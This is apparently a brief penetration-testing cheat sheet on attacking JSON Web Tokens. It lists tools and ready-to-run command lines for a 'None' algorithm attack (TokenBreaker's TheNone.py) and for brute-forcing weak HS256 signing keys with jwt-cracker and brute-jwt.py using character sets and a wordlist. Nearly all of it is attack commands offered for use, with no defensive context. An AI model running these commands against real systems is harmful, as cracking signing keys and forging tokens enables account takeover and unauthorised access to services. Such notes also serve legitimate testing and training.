JWT Attacks

JWT

Decode token:

• https://jwt.io

"None" algorithm

Get TokenBreaker

python3 TheNone.py -t <token>

Bruteforcing: Weak Signing Key

JWT-Cracker

Get jwt-cracker

jwt-cracker "<Token>" "abcdefghijklmnopqrstuwxyz" 6

jwt-cracker <Token> 1234567890 6

Brute-jwt

Get brute-jwt.py

python brute-jwt.py --file /usr/share/wordlists/secrets.txt --algorithm HS256 --token <Token>